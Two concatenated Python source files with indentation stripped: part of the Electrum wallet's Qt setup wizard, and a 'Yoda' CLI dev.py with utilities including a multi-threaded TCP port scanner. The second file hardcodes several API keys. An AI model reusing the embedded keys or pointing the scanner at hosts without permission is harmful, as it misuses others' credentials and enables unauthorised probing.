hbox.addWidget(QLabel(_('Wallet') + ':'))
name_e = QLineEdit()
hbox.addWidget(name_e)
button = QPushButton(_('Choose...'))
hbox.addWidget(button)
vbox.addLayout(hbox)
msg_label = WWLabel('')
vbox.addWidget(msg_label)
hbox2 = QHBoxLayout()
pw_e = PasswordLineEdit('', self)
pw_e.setFixedWidth(17 * char_width_in_lineedit())
pw_label = QLabel(_('Password') + ':')
hbox2.addWidget(pw_label)
hbox2.addWidget(pw_e)
hbox2.addStretch()
vbox.addLayout(hbox2)
vbox.addSpacing(50)
vbox_create_new = QVBoxLayout()
vbox_create_new.addWidget(QLabel(_('Alternatively') + ':'), alignment=Qt.AlignLeft)
button_create_new = QPushButton(_('Create New Wallet'))
button_create_new.setMinimumWidth(120)
vbox_create_new.addWidget(button_create_new, alignment=Qt.AlignLeft)
widget_create_new = QWidget()
widget_create_new.setLayout(vbox_create_new)
vbox_create_new.setContentsMargins(0, 0, 0, 0)
vbox.addWidget(widget_create_new)
self.set_layout(vbox, title=_('Electrum wallet'))
temp_storage = None # type: Optional[WalletStorage]
wallet_folder = os.path.dirname(path)
def on_choose():
path, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if path:
name_e.setText(path)
def on_filename(filename):
# FIXME? "filename" might contain ".." (etc) and hence sketchy path traversals are possible
nonlocal temp_storage
temp_storage = None
msg = None
path = os.path.join(wallet_folder, filename)
wallet_from_memory = get_wallet_from_daemon(path)
try:
if wallet_from_memory:
temp_storage = wallet_from_memory.storage # type: Optional[WalletStorage]
else:
temp_storage = WalletStorage(path)
except (StorageReadWriteError, WalletFileException) as e:
msg = _('Cannot read file') + f'\n{repr(e)}'
except Exception as e:
self.logger.exception('')
msg = _('Cannot read file') + f'\n{repr(e)}'
self.next_button.setEnabled(temp_storage is not None)
user_needs_to_enter_password = False
if temp_storage:
if not temp_storage.file_exists():
msg =_("This file does not exist.") + '\n' \
+ _("Press 'Next' to create this wallet, or choose another file.")
elif not wallet_from_memory:
if temp_storage.is_encrypted_with_user_pw():
msg = _("This file is encrypted with a password.") + '\n' \
+ _('Enter your password or choose another file.')
user_needs_to_enter_password = True
elif temp_storage.is_encrypted_with_hw_device():
msg = _("This file is encrypted using a hardware device.") + '\n' \
+ _("Press 'Next' to choose device to decrypt.")
else:
msg = _("Press 'Next' to open this wallet.")
else:
msg = _("This file is already open in memory.") + "\n" \
+ _("Press 'Next' to create/focus window.")
if msg is None:
msg = _('Cannot read file')
msg_label.setText(msg)
widget_create_new.setVisible(bool(temp_storage and temp_storage.file_exists()))
if user_needs_to_enter_password:
pw_label.show()
pw_e.show()
pw_e.setFocus()
else:
pw_label.hide()
pw_e.hide()
button.clicked.connect(on_choose)
button_create_new.clicked.connect(
partial(
name_e.setText,
get_new_wallet_name(wallet_folder)))
name_e.textChanged.connect(on_filename)
name_e.setText(os.path.basename(path))
def run_user_interaction_loop():
while True:
if self.loop.exec_() != 2: # 2 = next
raise UserCancelled()
assert temp_storage
if temp_storage.file_exists() and not temp_storage.is_encrypted():
break
if not temp_storage.file_exists():
break
wallet_from_memory = get_wallet_from_daemon(temp_storage.path)
if wallet_from_memory:
raise WalletAlreadyOpenInMemory(wallet_from_memory)
if temp_storage.file_exists() and temp_storage.is_encrypted():
if temp_storage.is_encrypted_with_user_pw():
password = pw_e.text()
try:
temp_storage.decrypt(password)
break
except InvalidPassword as e:
self.show_message(title=_('Error'), msg=str(e))
continue
except BaseException as e:
self.logger.exception('')
self.show_message(title=_('Error'), msg=repr(e))
raise UserCancelled()
elif temp_storage.is_encrypted_with_hw_device():
try:
self.run('choose_hw_device', HWD_SETUP_DECRYPT_WALLET, storage=temp_storage)
except InvalidPassword as e:
self.show_message(title=_('Error'),
msg=_('Failed to decrypt using this hardware device.') + '\n' +
_('If you use a passphrase, make sure it is correct.'))
self.reset_stack()
return self.select_storage(path, get_wallet_from_daemon)
except (UserCancelled, GoBack):
raise
except BaseException as e:
self.logger.exception('')
self.show_message(title=_('Error'), msg=repr(e))
raise UserCancelled()
if temp_storage.is_past_initial_decryption():
break
else:
raise UserCancelled()
else:
raise Exception('Unexpected encryption version')
try:
run_user_interaction_loop()
finally:
try:
pw_e.clear()
except RuntimeError: # wrapped C/C++ object has been deleted.
pass # happens when decrypting with hw device
return temp_storage.path, (temp_storage if temp_storage.file_exists() else None)
def run_upgrades(self, storage: WalletStorage, db: 'WalletDB') -> None:
path = storage.path
if db.requires_split():
self.hide()
msg = _("The wallet '{}' contains multiple accounts, which are no longer supported since Electrum 2.7.\n\n"
"Do you want to split your wallet into multiple files?").format(path)
if not self.question(msg):
return
file_list = db.split_accounts(path)
msg = _('Your accounts have been moved to') + ':\n' + '\n'.join(file_list) + '\n\n'+ _('Do you want to delete the old file') + ':\n' + path
if self.question(msg):
os.remove(path)
self.show_warning(_('The file was removed'))
# raise now, to avoid having the old storage opened
raise UserCancelled()
action = db.get_action()
if action and db.requires_upgrade():
raise WalletFileException('Incomplete wallet files cannot be upgraded.')
if action:
self.hide()
msg = _("The file '{}' contains an incompletely created wallet.\n"
"Do you want to complete its creation now?").format(path)
if not self.question(msg):
if self.question(_("Do you want to delete '{}'?").format(path)):
os.remove(path)
self.show_warning(_('The file was removed'))
return
self.show()
self.data = json.loads(storage.read())
self.run(action)
for k, v in self.data.items():
db.put(k, v)
db.write(storage)
return
if db.requires_upgrade():
self.upgrade_db(storage, db)
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
self.logger.error("on_error", exc_info=exc_info)
self.show_error(str(exc_info[1]))
def set_icon(self, filename):
prior_filename, self.icon_filename = self.icon_filename, filename
self.logo.setPixmap(QPixmap(icon_path(filename))
.scaledToWidth(60, mode=Qt.SmoothTransformation))
return prior_filename
def set_layout(self, layout, title=None, next_enabled=True):
self.title.setText("<b>%s</b>"%title if title else "")
self.title.setVisible(bool(title))
# Get rid of any prior layout by assigning it to a temporary widget
prior_layout = self.main_widget.layout()
if prior_layout:
QWidget().setLayout(prior_layout)
self.main_widget.setLayout(layout)
self.back_button.setEnabled(True)
self.next_button.setEnabled(next_enabled)
if next_enabled:
self.next_button.setFocus()
self.main_widget.setVisible(True)
self.please_wait.setVisible(False)
def exec_layout(self, layout, title=None, raise_on_cancel=True,
next_enabled=True):
self.set_layout(layout, title, next_enabled)
result = self.loop.exec_()
if not result and raise_on_cancel:
raise UserCancelled()
if result == 1:
raise GoBack from None
self.title.setVisible(False)
self.back_button.setEnabled(False)
self.next_button.setEnabled(False)
self.main_widget.setVisible(False)
self.please_wait.setVisible(True)
self.refresh_gui()
return result
def refresh_gui(self):
# For some reason, to refresh the GUI this needs to be called twice
self.app.processEvents()
self.app.processEvents()
def remove_from_recently_open(self, filename):
self.config.remove_from_recently_open(filename)
def text_input(self, title, message, is_valid, allow_multi=False):
slayout = KeysLayout(parent=self, header_layout=message, is_valid=is_valid,
allow_multi=allow_multi)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_text()
def seed_input(self, title, message, is_seed, options):
slayout = SeedLayout(title=message, is_seed=is_seed, options=options, parent=self)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_seed(), slayout.is_bip39, slayout.is_ext
@wizard_dialog
def add_xpub_dialog(self, title, message, is_valid, run_next, allow_multi=False, show_wif_help=False):
header_layout = QHBoxLayout()
label = WWLabel(message)
label.setMinimumWidth(400)
header_layout.addWidget(label)
if show_wif_help:
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
return self.text_input(title, header_layout, is_valid, allow_multi)
@wizard_dialog
def add_cosigner_dialog(self, run_next, index, is_valid):
title = _("Add Cosigner") + " %d"%index
message = ' '.join([
_('Please enter the master public key (xpub) of your cosigner.'),
_('Enter their master private key (xprv) if you want to be able to sign for them.')
])
return self.text_input(title, message, is_valid)
@wizard_dialog
def restore_seed_dialog(self, run_next, test):
options = []
if self.opt_ext:
options.append('ext')
if self.opt_bip39:
options.append('bip39')
title = _('Enter Seed')
message = _('Please enter your seed phrase in order to restore your wallet.')
return self.seed_input(title, message, test, options)
@wizard_dialog
def confirm_seed_dialog(self, run_next, seed, test):
self.app.clipboard().clear()
title = _('Confirm Seed')
message = ' '.join([
_('Your seed is important!'),
_('If you lose your seed, your money will be permanently lost.'),
_('To make sure that you have properly saved your seed, please retype it here.')
])
seed, is_bip39, is_ext = self.seed_input(title, message, test, None)
return seed
@wizard_dialog
def show_seed_dialog(self, run_next, seed_text):
title = _("Your wallet generation seed is:")
slayout = SeedLayout(seed=seed_text, title=title, msg=True, options=['ext'])
self.exec_layout(slayout)
return slayout.is_ext
def pw_layout(self, msg, kind, force_disable_encrypt_cb):
playout = PasswordLayout(msg=msg, kind=kind, OK_button=self.next_button,
force_disable_encrypt_cb=force_disable_encrypt_cb)
playout.encrypt_cb.setChecked(True)
try:
self.exec_layout(playout.layout())
return playout.new_password(), playout.encrypt_cb.isChecked()
finally:
playout.clear_password_fields()
@wizard_dialog
def request_password(self, run_next, force_disable_encrypt_cb=False):
"""Request the user enter a new password and confirm it. Return
the password or None for no password."""
return self.pw_layout(MSG_ENTER_PASSWORD, PW_NEW, force_disable_encrypt_cb)
@wizard_dialog
def request_storage_encryption(self, run_next):
playout = PasswordLayoutForHW(MSG_HW_STORAGE_ENCRYPTION)
playout.encrypt_cb.setChecked(True)
self.exec_layout(playout.layout())
return playout.encrypt_cb.isChecked()
@wizard_dialog
def confirm_dialog(self, title, message, run_next):
self.confirm(message, title)
def confirm(self, message, title):
label = WWLabel(message)
vbox = QVBoxLayout()
vbox.addWidget(label)
self.exec_layout(vbox, title)
@wizard_dialog
def action_dialog(self, action, run_next):
self.run(action)
def terminate(self, **kwargs):
self.accept_signal.emit()
def waiting_dialog(self, task, msg, on_finished=None):
label = WWLabel(msg)
vbox = QVBoxLayout()
vbox.addSpacing(100)
label.setMinimumWidth(300)
label.setAlignment(Qt.AlignCenter)
vbox.addWidget(label)
self.set_layout(vbox, next_enabled=False)
self.back_button.setEnabled(False)
t = threading.Thread(target=task)
t.start()
while True:
t.join(1.0/60)
if t.is_alive():
self.refresh_gui()
else:
break
if on_finished:
on_finished()
def run_task_without_blocking_gui(self, task, *, msg=None):
assert self.gui_thread == threading.current_thread(), 'must be called from GUI thread'
if msg is None:
msg = _("Please wait...")
exc = None # type: Optional[Exception]
res = None
def task_wrapper():
nonlocal exc
nonlocal res
try:
res = task()
except Exception as e:
exc = e
self.waiting_dialog(task_wrapper, msg=msg)
if exc is None:
return res
else:
raise exc
@wizard_dialog
def choice_dialog(self, title, message, choices, run_next):
c_values = [x[0] for x in choices]
c_titles = [x[1] for x in choices]
clayout = ChoicesLayout(message, c_titles)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, title)
action = c_values[clayout.selected_index()]
return action
def query_choice(self, msg, choices):
"""called by hardware wallets"""
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, '')
return clayout.selected_index()
@wizard_dialog
def derivation_and_script_type_gui_specific_dialog(
self,
*,
title: str,
message1: str,
choices: List[Tuple[str, str, str]],
hide_choices: bool = False,
message2: str,
test_text: Callable[[str], int],
run_next,
default_choice_idx: int = 0,
get_account_xpub=None,
) -> Tuple[str, str]:
vbox = QVBoxLayout()
if get_account_xpub:
button = QPushButton(_("Detect Existing Accounts"))
def on_account_select(account):
script_type = account["script_type"]
if script_type == "p2pkh":
script_type = "standard"
button_index = c_values.index(script_type)
button = clayout.group.buttons()[button_index]
button.setChecked(True)
line.setText(account["derivation_path"])
button.clicked.connect(lambda: Bip39RecoveryDialog(self, get_account_xpub, on_account_select))
vbox.addWidget(button, alignment=Qt.AlignLeft)
vbox.addWidget(QLabel(_("Or")))
c_values = [x[0] for x in choices]
c_titles = [x[1] for x in choices]
c_default_text = [x[2] for x in choices]
def on_choice_click(clayout):
idx = clayout.selected_index()
line.setText(c_default_text[idx])
clayout = ChoicesLayout(message1, c_titles, on_choice_click,
checked_index=default_choice_idx)
if not hide_choices:
vbox.addLayout(clayout.layout())
vbox.addWidget(WWLabel(message2))
line = QLineEdit()
def on_text_change(text):
self.next_button.setEnabled(test_text(text))
line.textEdited.connect(on_text_change)
on_choice_click(clayout) # set default text for "line"
vbox.addWidget(line)
self.exec_layout(vbox, title)
choice = c_values[clayout.selected_index()]
return str(line.text()), choice
@wizard_dialog
def line_dialog(self, run_next, title, message, default, test, warning='',
presets=(), warn_issue4566=False):
vbox = QVBoxLayout()
vbox.addWidget(WWLabel(message))
line = QLineEdit()
line.setText(default)
def f(text):
self.next_button.setEnabled(test(text))
if warn_issue4566:
text_whitespace_normalised = ' '.join(text.split())
warn_issue4566_label.setVisible(text != text_whitespace_normalised)
line.textEdited.connect(f)
vbox.addWidget(line)
vbox.addWidget(WWLabel(warning))
warn_issue4566_label = WWLabel(MSG_PASSPHRASE_WARN_ISSUE4566)
warn_issue4566_label.setVisible(False)
vbox.addWidget(warn_issue4566_label)
for preset in presets:
button = QPushButton(preset[0])
button.clicked.connect(lambda __, text=preset[1]: line.setText(text))
button.setMinimumWidth(150)
hbox = QHBoxLayout()
hbox.addWidget(button, alignment=Qt.AlignCenter)
vbox.addLayout(hbox)
self.exec_layout(vbox, title, next_enabled=test(default))
return line.text()
@wizard_dialog
def show_xpub_dialog(self, xpub, run_next):
msg = ' '.join([
_("Here is your master public key."),
_("Please share it with your cosigners.")
])
vbox = QVBoxLayout()
layout = SeedLayout(xpub, title=msg, icon=False, for_seed_words=False)
vbox.addLayout(layout.layout())
self.exec_layout(vbox, _('Master Public Key'))
return None
def init_network(self, network: 'Network'):
message = _("Electrum communicates with remote servers to get "
"information about your transactions and addresses. The "
"servers all fulfill the same purpose only differing in "
"hardware. In most cases you simply want to let Electrum "
"pick one at random. However if you prefer feel free to "
"select a server manually.")
choices = [_("Auto connect"), _("Select server manually")]
title = _("How do you want to connect to a server? ")
clayout = ChoicesLayout(message, choices)
self.back_button.setText(_('Cancel'))
self.exec_layout(clayout.layout(), title)
r = clayout.selected_index()
if r == 1:
nlayout = NetworkChoiceLayout(network, self.config, wizard=True)
if self.exec_layout(nlayout.layout()):
nlayout.accept()
self.config.set_key('auto_connect', network.auto_connect, True)
else:
network.auto_connect = True
self.config.set_key('auto_connect', True, True)
@wizard_dialog
def multisig_dialog(self, run_next):
cw = CosignWidget(2, 2)
m_edit = QSlider(Qt.Horizontal, self)
n_edit = QSlider(Qt.Horizontal, self)
n_edit.setMinimum(2)
n_edit.setMaximum(15)
m_edit.setMinimum(1)
m_edit.setMaximum(2)
n_edit.setValue(2)
m_edit.setValue(2)
n_label = QLabel()
m_label = QLabel()
grid = QGridLayout()
grid.addWidget(n_label, 0, 0)
grid.addWidget(n_edit, 0, 1)
grid.addWidget(m_label, 1, 0)
grid.addWidget(m_edit, 1, 1)
def on_m(m):
m_label.setText(_('Require {0} signatures').format(m))
cw.set_m(m)
backup_warning_label.setVisible(cw.m != cw.n)
def on_n(n):
n_label.setText(_('From {0} cosigners').format(n))
cw.set_n(n)
m_edit.setMaximum(n)
backup_warning_label.setVisible(cw.m != cw.n)
n_edit.valueChanged.connect(on_n)
m_edit.valueChanged.connect(on_m)
vbox = QVBoxLayout()
vbox.addWidget(cw)
vbox.addWidget(WWLabel(_("Choose the number of signatures needed to unlock funds in your wallet:")))
vbox.addLayout(grid)
vbox.addSpacing(2 * char_width_in_lineedit())
backup_warning_label = WWLabel(_("Warning: to be able to restore a multisig wallet, "
"you should include the master public key for each cosigner "
"in all of your backups."))
vbox.addWidget(backup_warning_label)
on_n(2)
on_m(2)
self.exec_layout(vbox, _("Multi-Signature Wallet"))
m = int(m_edit.value())
n = int(n_edit.value())
return (m, n)
|
dev.py | from __future__ import absolute_import
from __future__ import division
import collections
import json
import re
import itertools
import string
import sys
from builtins import range
from builtins import str
from pydub import AudioSegment
from pydub.playback import play
from fuzzywuzzy import fuzz
import pyspeedtest
import os
import requests
import pandas as pd
from past.utils import old_div
from .util import *
from .alias import alias_checker
from .config import *
from resources.hackerearth.language import supported_languages
from resources.hackerearth.parameters import RunAPIParameters
from resources.hackerearth.api_handlers import HackerEarthAPI
from .ciphers import *
FIREBASE_DYNAMIC_LINK_API_KEY = "AIzaSyAuVJ0zfUmacDG5Vie4Jl7_ercv6gSwebc"
GOOGLE_URL_SHORTENER_API_KEY = "AIzaSyCBAXe-kId9UwvOQ7M2cLYR7hyCpvfdr7w"
domain = "yodacli.page.link"
HACKEREARTH_API_KEY = "0a7f0101e5cc06e4417a3addeb76164680ac83a4"
whois_base_url = "https://www.whois.com/whois/"
KEYBINDINGS_CONFIG_FILE_PATH = get_config_file_paths()["KEYBINDINGS_CONFIG_FILE_PATH"]
KEYBINDINGS_CONFIG_FOLDER_PATH = get_folder_path_from_file_path(
KEYBINDINGS_CONFIG_FILE_PATH
)
def get_software_file_path(software_name):
"""
get file path for software entry file
:return:
"""
return KEYBINDINGS_CONFIG_FOLDER_PATH + "/" + software_name + ".yaml"
def append_data_into_file(data, file_path):
"""
append data into existing file
:param data:
:param file_path:
"""
with open(file_path) as todays_tasks_entry:
# read contents
contents = yaml.load(todays_tasks_entry)
contents["entries"].append(data)
# enter data
with open(file_path, "w") as todays_tasks_entry:
yaml.dump(contents, todays_tasks_entry, default_flow_style=False)
@click.group()
def dev():
"""
Dev command group:\n
contains commands helpful for developers
"""
@dev.command()
def speedtest():
"""
Run a speed test for your internet connection
"""
os.system("speedtest-cli")
# code for URL command
def url_shorten(url_to_be_shortened):
"""
shorten url
:param url_to_be_shortened:
"""
try:
r = requests.post(
"https://firebasedynamiclinks.googleapis.com/v1/shortLinks?key="
+ FIREBASE_DYNAMIC_LINK_API_KEY,
data=json.dumps(
{
"dynamicLinkInfo": {
"dynamicLinkDomain": domain,
"link": url_to_be_shortened,
}
}
),
headers={"Content-Type": "application/json"},
)
except requests.exceptions.ConnectionError:
click.echo("Yoda cannot sense the internet right now!")
sys.exit(1)
data = r.json()
response = "Here's your shortened URL:\n" + data["shortLink"]
click.echo(response)
def url_expand(url_to_be_expanded):
"""
expander
:param url_to_be_expanded:
"""
try:
r = requests.get(
"https://www.googleapis.com/urlshortener/v1/url?key="
+ GOOGLE_URL_SHORTENER_API_KEY
+ "&shortUrl="
+ url_to_be_expanded
)
except requests.exceptions.ConnectionError:
click.echo("Yoda cannot sense the internet right now!")
sys.exit(1)
data = r.json()
res = data["longUrl"]
if domain in data["longUrl"]:
res = data["longUrl"].split("=")[1]
# res = res[:-3]
response = "Here's your original URL:\n" + res
click.echo(response)
def check_sub_command_url(action, url_to_be_expanded_or_shortened):
"""
command checker for url shortener and expander
:param action:
:param url_to_be_expanded_or_shortened:
:return:
"""
sub_commands = {"shorten": url_shorten, "expand": url_expand}
try:
return sub_commands[action](url_to_be_expanded_or_shortened)
except KeyError:
click.echo(chalk.red("Command does not exist!"))
click.echo('Try "yoda url --help" for more info')
def add_keybindings(software, keybinding_filepath):
"""
add/import key binding file
:param software:
:param keybinding_filepath:
"""
SOFTWARE_FILE_PATH = get_software_file_path(software)
if not os.path.isfile(SOFTWARE_FILE_PATH):
if os.path.isfile(KEYBINDINGS_CONFIG_FILE_PATH):
setup_data = dict(software=software, file=software + ".yaml")
append_data_into_file(setup_data, KEYBINDINGS_CONFIG_FILE_PATH)
else:
setup_data = dict(
entries=[dict(software=software, file=software + ".yaml")]
)
input_data(setup_data, KEYBINDINGS_CONFIG_FILE_PATH)
try:
data = pd.read_csv(keybinding_filepath, header=None)
with open(SOFTWARE_FILE_PATH, "w") as fin:
entries = []
for index, row in data.iterrows():
action = row[0]
_key = row[1]
entry = {"action": action, "key": _key}
entries.append(entry)
setup_data = dict(entries=entries)
input_data(setup_data, SOFTWARE_FILE_PATH)
except Exception as e:
print(e)
else:
click.echo(
chalk.red(
"Software's config file already exists. Type 'yoda dev keybindings --help'"
)
)
def search_keybindings(software, search_key):
"""
search
:param software:
:param search_key:
"""
SOFTWARE_FILE_PATH = get_software_file_path(software)
matched_keys = []
matched_actions = []
matched_keys_actions_pairs = []
if os.path.isfile(SOFTWARE_FILE_PATH):
with open(SOFTWARE_FILE_PATH) as fin:
contents = yaml.load(fin)
entries = contents["entries"]
# click.echo(entries)
for entry in entries:
act = entry["action"]
key = entry["key"]
# fr = fuzz.ratio(search_key,act)
# fpr = fuzz.partial_ratio(search_key,act)
ftsr = fuzz.token_sort_ratio(search_key, act)
# print([fr,fpr,ftsr])
# if any(fuzzy_match for fuzzy_match in [fr,fpr,ftsr] if fuzzy_match>=50):
if ftsr >= 50:
# click.echo(entry)
matched_actions.append(act)
matched_keys.append(key)
if matched_actions:
matched_keys_actions_pairs = list(zip(matched_keys, matched_actions))
## Beautify matched output
if matched_keys_actions_pairs:
click.echo("Key Bindings:")
click.echo("---------------------------------------")
click.echo(" key | action ")
click.echo("---------------|-----------------------")
for key, act in matched_keys_actions_pairs:
click.echo(" " + key + " | " + act)
else:
click.echo(chalk.red("No key matched, please try another option"))
else:
click.echo(
chalk.red(
"Software's config file doesn't exist. Type 'yoda dev keybindings --help'"
)
)
def check_sub_command_keybindings(action, software, fp_or_searchkey):
"""
command checker for keybindings\n
:param action:
:param fp_or_searchkey:,
:return:
"""
sub_commands = {"add": add_keybindings, "search": search_keybindings}
try:
return sub_commands[action](software, fp_or_searchkey)
except KeyError:
click.echo(chalk.red("Command does not exist!"))
click.echo('Try "yoda dev keybindings --help" for more info')
@dev.command()
@click.pass_context
@click.argument("input", nargs=1, required=False, callback=alias_checker)
@click.argument("url", nargs=1, required=False, callback=alias_checker)
def url(ctx, input, url):
"""
URL shortener and expander\n\n
Commands:
shorten: to shorten the given URL
expand: to expand shortened URL
"""
input, url = get_arguments(ctx, 2)
_input = str(input)
_url = str(url)
check_sub_command_url(_input, _url)
@dev.command()
def hackernews():
"""
Hacker news top headlines
"""
_url = "https://newsapi.org/v2/everything?sources=hacker-news&apiKey=534594afc0d64a11819bb83ac1df4245"
response = requests.get(_url)
result = response.json()
if result["status"] == "ok":
for index, item in enumerate(result["articles"]):
counter = "{}/{} \n".format((index + 1), len(result["articles"]))
title = item["title"] or "No title"
description = item["description"] or "No description"
url = item["url"] or "No url"
click.echo("News-- " + counter)
click.echo("Title-- " + title)
click.echo("Description-- " + description)
click.echo("url-- " + url)
click.echo()
click.echo('Continue? [press-"y"] ')
c = click.getchar()
click.echo() # newline after news item
if c != "y":
break
else:
click.echo("Error in api")
@dev.command()
def coinflip():
"""
Flips a coin and displays an outcome
"""
import random
side = random.randint(1, 100) % 2
click.echo("Heads" if side == 1 else "Tails")
@dev.command()
def portscan():
"""
Scan open ports of a website,
utilizing multi-threading to speed the task along
"""
import threading
import re
is_py2 = sys.version[0] == "2"
if is_py2:
import Queue as queue
else:
import queue as queue
def scanPortsTask(port):
import socket
socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
socket.settimeout(1.0)
try:
socket.connect((targetForScan, port))
with lock_output:
click.echo("port:" + str(port) + " is open")
except Exception as e:
pass
def taskMaster():
while True:
port = port_queue.get()
scanPortsTask(port)
port_queue.task_done()
lock_output = threading.Lock()
port_queue = queue.Queue()
targetForScan = input("Where scan ports, should I: ")
pattern = "([\da-z\.-]+)\.([a-z\.]{2,6})$"
if re.match(pattern, targetForScan):
for x in range(200):
t = threading.Thread(target=taskMaster)
t.daemon = True
t.start()
for worker in range(1, 1000):
port_queue.put(worker)
port_queue.join()
else:
click.echo(
"Find " + targetForScan + " I cannot, " + "sure spelled correctly, are you?"
)
@dev.command()
@click.pass_context
@click.argument("ip_address", nargs=1, required=False, callback=alias_checker)
def iplookup(ctx, ip_address):
"""
Find the geographical location of a given IP address.
"""
# import pdb; pdb.set_trace()
ip_address = get_arguments(ctx, 1)
if not ip_address:
return click.echo(
"Please supply an IP address as follows: $ yoda iplookup <ip_address>"
)
_ip_address = str(ip_address)
import geoip2.database
path = os.path.dirname(sys.modules["yoda"].__file__)
path = os.path.join(path, "resources/databases/GeoLite2-City.mmdb")
reader = geoip2.database.Reader(path)
response = reader.city(_ip_address)
return click.echo(
"{0}, {1}".format(
response.subdivisions.most_specific.name, response.country.name
)
)
@dev.command()
@click.pass_context
@click.argument("link", nargs=1, required=True)
def checksite(ctx, link):
"""
Check if website is up and running.
"""
click.echo("Connecting...")
# request
try:
r = requests.get(link)
except requests.exceptions.ConnectionError:
click.echo('Looks like {0} is not a valid URL, check the URL and try again.'.format(link))
sys.exit(-1)
# check the status code
if r.status_code != 200:
click.echo("Uh-oh! Site is down. :'(")
sys.exit(1)
else:
click.echo('Yay! The site is up and running! :)')
@dev.command()
@click.pass_context
@click.argument("astrological_sign", nargs=1, required=False, callback=alias_checker)
def horoscope(ctx, astrological_sign):
"""
Find the today's horoscope for the given astrological sign.
"""
astrological_sign = get_arguments(ctx, 1)
_astrological_sign = str(astrological_sign)
try:
r = requests.get(
"http://horoscope-api.herokuapp.com/horoscope/today/{0}".format(
astrological_sign
)
)
return click.echo(r.json()["horoscope"])
except requests.exceptions.ConnectionError:
click.echo('Yoda cannot sense the internet right now!')
sys.exit(-1)
# idea list process
@dev.command()
@click.argument("pattern", nargs=1)
@click.argument("path", nargs=1)
@click.option("-r", nargs=1, required=False, default=False)
@click.option("-i", nargs=1, required=False, default=False)
def grep(pattern, path, r, i):
"""
Grep for a pattern in a file or recursively through a folder.
yoda dev grep PATTERN PATH [OPTIONAL ARGUMENTS]
"""
recursive, ignorecase = r, i
if ignorecase:
pattern = re.compile(pattern, flags=re.IGNORECASE)
else:
pattern = re.compile(pattern)
if os.path.isfile(path):
if recursive:
click.echo(chalk.red("Cannot use recursive flag with a file name."))
return
with open(path, "r") as infile:
for match in search_file(pattern, infile):
click.echo(match, nl=False)
else:
for dirpath, dirnames, filenames in os.walk(path, topdown=True):
for filename in filenames:
with open(os.path.join(dirpath, filename), "r") as infile:
for match in search_file(pattern, infile):
click.echo(match, nl=False)
if not recursive:
break
@dev.command()
@click.pass_context
@click.argument("path", nargs=1, required=True)
@click.argument("start", nargs=1, required=False, default=0)
@click.argument("end", nargs=1, required=False, default=0)
def mp3cutter(ctx, path, start, end):
"""
This command can be used to cut audio tracks right inside your terminal.
yoda dev mp3cutter MUSIC_PATH START[default: 0] END[default:lenght of music]
"""
click.echo("\nOpening file...")
if not os.path.isfile(path):
click.echo(
chalk.red(
"No file such as "
+ path
+ ", Please re-check the file path and try again."
)
)
sys.exit(1)
try:
song = AudioSegment.from_mp3(path)
except IndexError:
click.echo(chalk.red("Wrong file format :'( "))
sys.exit(1)
song_length = len(song)
# Check if end point is given or not
if not end:
end = song_length / 1000
# Check if end point is greater than length of song
if end > song_length:
click.echo("Duh! Given endpoint is greater than lenght of music :'( ")
sys.exit(1)
start = start * 1000
end = end * 1000
if start > end:
click.echo(
"Given startpoint ({0}s) is greater than endpoint ({1}s) :/ ".format(
start / 1000 / 60, end / 1000 / 60
)
)
sys.exit(1)
if start > song_length:
click.echo(
"Given startpoint ({0}s) is greater than the lenght of music ({1}s)".format(
start / 1000 / 60, song_length / 1000 / 60
)
)
sys.exit(1)
click.echo("Cropping mp3 file from: " + str(start) + " to: " + str(end / 1000))
cropped_file_location = path.replace(".mp3", "_cropped.mp3")
# cut the mp3 file
song = song[start:end]
# save
song.export(cropped_file_location, format="mp3")
click.echo("Yay!! Successfully cropped! :)\n")
if click.confirm("Do you want to play the cropped mp3 file?"):
play(song)
@dev.command()
@click.pass_context
@click.argument("domain", nargs=1, required=True)
def whois(ctx, domain):
"""
Get the information about domains.
"""
click.echo("Verifying domain...\n")
data_obj = get_whois_data(domain)[0]
if not "Domain" in data_obj:
click.echo("This domain has not been registered yet :/")
sys.exit(1)
# Data that we display
labels = [
"Domain",
"Registrar",
"Organization",
"Country",
"Registered On",
"Expires On",
"Updated On",
]
for idx, label in enumerate(labels):
# Eg: "Domain: Facebook.com"
# Formula: Label + whitespace + value
text_to_print = label + ":" + " " * (14 - len(label)) + data_obj[label]
if idx == 3:
text_to_print += "\n"
click.echo(text_to_print)
def get_whois_data(domain):
req = requests.get(whois_base_url + domain)
html = req.text
soup = BeautifulSoup(html, "lxml")
labels = soup.findAll("div", attrs={"class": "df-label"})
values = soup.findAll("div", attrs={"class": "df-value"})
data_obj = {}
# convert into pythons dictionaire
for i in range(len(labels)):
data_obj[clean_soup_data(labels[i])] = clean_soup_data(values[i])
return data_obj, req.status_code
@dev.command()
@click.pass_context
@click.argument("path", nargs=1, required=True)
def fileshare(ctx, path):
"""
Upload and share files using https://file.io.
"""
if os.path.isfile(path):
files = {'file': open(path, 'rb')}
resp = requests.post('https://file.io', files=files)
response_json = json.loads(resp.text)
if 'link' in response_json.keys():
click.echo(chalk.green("File Link : " + response_json['link']))
click.echo(chalk.yellow("WARNING: File will be deleted after it is accessed once."))
else:
click.echo(chalk.red("File upload failed!"))
sys.exit(1)
else:
click.echo(chalk.red("No file such as " + path + ", Please re-check the PATH and try again."))
sys.exit(-1)
@dev.command()
@click.pass_context
@click.argument("input", nargs=1, required=True, callback=alias_checker)
@click.argument("software", nargs=1, required=False, callback=alias_checker)
@click.argument("fp_or_searchkey", nargs=1, required=False, callback=alias_checker)
def keybindings(ctx, input, software, fp_or_searchkey):
"""
This command can be used to save or search keybindings for different softwares.
yoda dev keybindings INPUT[add,search] SOFTWARE_NAME[default: None] FILE_TO_ADD_OR_ACTION_TO_SEARCH[default:None]
"""
input, software, fp_or_searchkey = get_arguments(ctx, 3)
_input = str(input)
_software = str(software)
_fp_or_searchkey = str(fp_or_searchkey)
create_folder(KEYBINDINGS_CONFIG_FOLDER_PATH)
# print(_input,_software,_fp_or_searchkey)
check_sub_command_keybindings(_input, _software, _fp_or_searchkey)
